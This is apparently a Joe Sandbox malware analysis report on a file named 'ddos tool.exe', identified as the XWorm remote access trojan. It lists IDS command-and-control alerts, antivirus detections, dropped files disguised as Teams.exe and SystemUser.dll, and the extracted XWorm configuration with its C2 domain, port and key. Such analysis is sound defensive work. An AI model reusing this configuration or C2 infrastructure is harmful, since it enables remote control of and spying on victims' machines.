                  2025-01-03T22:21:12.631157+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.740541+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.849960+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.959203+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.068619+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.206068+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.318523+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.428043+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.537621+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.646815+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.756355+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.865430+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.974984+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.084368+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.275053+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.384655+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.506690+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.615398+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.724994+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.834181+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.943782+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.056048+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.164189+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.271709+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.382409+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.491321+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.599847+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.709200+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.818562+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.927898+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.037442+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.146716+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.258991+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.365551+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.474940+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.584134+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.695233+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.802963+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.964527+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.118865+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.404915+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.506327+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.615463+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.725035+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.834350+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.943721+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.053060+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.162512+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.308123+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.381345+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.490547+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.599959+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.712103+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.818735+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.928055+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.039281+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.150163+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.256122+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.365473+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.476318+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.603984+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.710330+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.912918+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.121013+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.224917+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.334432+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.445079+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.553100+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.662347+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.771857+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.881106+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.990386+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.100101+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.209764+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.318697+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.457028+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.538561+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.646846+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.756331+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.867711+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.974999+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.084288+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.219435+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.303129+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.412965+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.793923+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.899190+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.006285+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.115411+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.225065+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.334310+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.443686+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.553107+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.662529+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.771935+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.881333+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.990559+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.099894+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.209562+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.318779+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.428093+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.537500+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.646802+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.756240+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.865712+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.975060+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.084454+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.194973+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.303035+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.412401+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.521747+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.631419+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.740507+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.849916+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.959299+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.068791+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.178065+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.289849+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.396798+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.506294+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.615762+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.724996+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.834213+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.972432+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.084194+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.193574+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.302945+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.412425+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.521690+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T22:21:05.838478+010028559241Malware Command and Control Activity Detected192.168.2.549941147.185.221.2457012TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T22:21:03.024636+010028531911Malware Command and Control Activity Detected147.185.221.2457012192.168.2.549941TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T22:21:02.664509+010028531921Malware Command and Control Activity Detected192.168.2.549941147.185.221.2457012TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: ddos tool.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: responsibility-popular.gl.at.ply.ggAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllAvira: detection malicious, Label: TR/Spy.Gen
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Found malware configuration
                  Source: 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["responsibility-popular.gl.at.ply.gg"], "Port": 57012, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllReversingLabs: Detection: 78%
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeReversingLabs: Detection: 78%
                  Multi AV Scanner detection for submitted file
                  Source: ddos tool.exeReversingLabs: Detection: 68%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: ddos tool.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: responsibility-popular.gl.at.ply.gg
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: 57012
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: <123456789>
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: <Xwormmm>
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: XWorm V5.6
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: USB.exe
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: %Temp%
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpString decryptor: SystemUser.dll
                  Source: ddos tool.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ddos tool.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4x nop then jmp 00007FF848E81562h4_2_00007FF848E813CC
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4x nop then jmp 00007FF848E82E64h4_2_00007FF848E7E108
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4x nop then jmp 00007FF848E82E64h4_2_00007FF848E7E108
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4x nop then jmp 00007FF848E82294h4_2_00007FF848E7E0D0
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4x nop then jmp 00007FF848E822A5h4_2_00007FF848E7E0D0

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.5:49941 -> 147.185.221.24:57012
                  Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.5:49983 -> 147.185.221.24:57012
                  Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 147.185.221.24:57012 -> 192.168.2.5:49941
                  Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49983 -> 147.185.221.24:57012
                  Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49941 -> 147.185.221.24:57012
                  Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.24:57012 -> 192.168.2.5:49941
                  Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49941 -> 147.185.221.24:57012
                  Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.24:57012 -> 192.168.2.5:49941
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: responsibility-popular.gl.at.ply.gg
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 147.185.221.24 ports 57012,0,1,2,5,7
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 4.0.Teams.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Teams.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.5:49941 -> 147.185.221.24:57012
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: responsibility-popular.gl.at.ply.gg
                  Source: powershell.exe, 0000000B.00000002.2331454415.00000296D7060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mY
                  Source: powershell.exe, 0000000D.00000002.2524316275.0000027571E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                  Source: svchost.exe, 00000014.00000002.3251862994.0000021553600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.20.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: Teams.exe, 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: Teams.exe, 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, Teams.exe, 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Teams.exe, 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, SystemUser.dll.4.dr, Teams.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000005.00000002.2089377470.00000193C1010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2166544814.000002801D6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2312674461.00000296CE9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000005.00000002.2073386726.00000193B11C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D8A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BEB89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: Teams.exe, 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2073386726.00000193B0FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.0000027500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000005.00000002.2073386726.00000193B11C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D8A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BEB89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000005.00000002.2073386726.00000193B0FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.0000027500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: edb.log.20.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000014.00000003.2647472347.0000021553380000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.20.dr, edb.log.20.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: powershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000005.00000002.2094410522.00000193C93BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
                  Source: powershell.exe, 00000005.00000002.2089377470.00000193C1010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2166544814.000002801D6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2312674461.00000296CE9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: qmgr.db.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 4.2.Teams.exe.1cf40000.0.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: 01 00 00 00 Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information set: 00 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 4.0.Teams.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 4.0.Teams.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
